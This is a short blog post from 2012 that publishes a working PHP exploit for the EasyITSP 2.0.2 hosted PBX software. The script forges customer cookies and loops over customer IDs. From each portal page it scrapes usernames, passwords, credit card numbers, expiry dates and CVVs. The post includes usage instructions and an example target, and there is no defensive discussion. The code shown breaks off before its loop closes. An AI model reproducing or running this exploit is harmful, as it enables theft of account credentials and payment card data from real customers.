piątek, 26 października 2012

Hack VoIP #2 - Exploit - EasyITSP by Lemens Telephone Systems 2.0.2

From EasyITSP website:
"The easiest ITSP and Hosted PBX software available. PERIOD! Lemens-TS has thousands of man hours in developing a solution with the smallest footprint possible. The goal was to keep things as simple as we could. Victory is ours."


Exploit code:

$arguments = getopt("a:b:c:");
$url = $arguments['a'];
$id_pod =$arguments['b'];
$id_end =$arguments['c'];
echo '## Exploit - EasyITSP by Lemens Telephone Systems 2.0.2   '."\n";
echo '## Discovery users with passwords       '."\n";
echo '##         '."\n";
echo '## Author: Michal Blaszczak       '."\n";
echo '## Website: blaszczakm.blogspot.com            '."\n";
echo '## Date: 10.10.2012       '."\n";
echo '##         '."\n";
echo '## Greatz: cond, packet, jestemka1pi, sid, chez            '."\n";
echo '##         #pakamera@freenode     '."\n";
echo '##         (old) #2600@ircnet     '."\n";
echo '##         (old) #mamo_mamo_jestem_chakerem@ircnet '."\n";
echo '##         '."\n";
echo '## Usage:         '."\n";
echo '## php exploit.php -a URL -b ID_START -c ID_STOP      '."\n";
echo '##         '."\n";
echo '## Example:        '."\n";
echo '## php exploit.php -a http://lemens-ts.com/easyitsp/customer/ -b 5 -c 10'."\n";

for ($id_pod; $id_pod <= $id_end; $id_pod++) {
$cookie = 'cust_verify=' . urlencode('#pakamera') . '; cust_id=' . urlencode($id_pod);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_POST, 1);//przesylamy metodą post
curl_setopt($ch, CURLOPT_POSTFIELDS, "customersid=$id_pod"); //dane do wyslania
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$intro = curl_exec($ch);

$regex_login = '#\<td title="Customer username for portal"\>(.+?)\<\/td\>#s';
preg_match($regex_login, $intro, $login);

$regex_pass = '#\<td title="Customer password for portal"><input type="password" name="password" required="1" maxlength="45" value="(.+?)"\>\<\/td\>#s';
preg_match($regex_pass, $intro, $pass);

$regex_ccnum = '#\<td title="Customer cc number"><input type="text" name="ccnumber" maxlength="20" value="(.+?)"\>\<\/td\>#s';
preg_match($regex_ccnum, $intro, $ccnum);

$regex_ccexpire = '#\<td title="Customer cc expire"><input type="text" name="ccexpire" maxlength="8" value="(.+?)"\>\<\/td\>#s';
preg_match($regex_ccexpire, $intro, $ccexpire);

$regex_cccvv = '#\<td title="Customer credit card CVV"><input type="text" name="cccvv" maxlength="6" value="(.+?)"\>\<\/td\>#s';
preg_match($regex_cccvv, $intro, $cccvv);

 $test = explode(" ",$login[1]);

 echo 'ID:'.$id_pod."\n";
 echo 'LOGIN:'.$login[1]."\n";
 echo 'Password:'.$pass[1]."\n";
 echo 'CCnumber:'.$ccnum[1]."\n";
 echo 'CCexpire:'.$ccexpire[1]."\n";
 echo 'CCCVV:'.$cccvv[1]."\n\n";


Source: http://pastebin.com/SmQVfBBD

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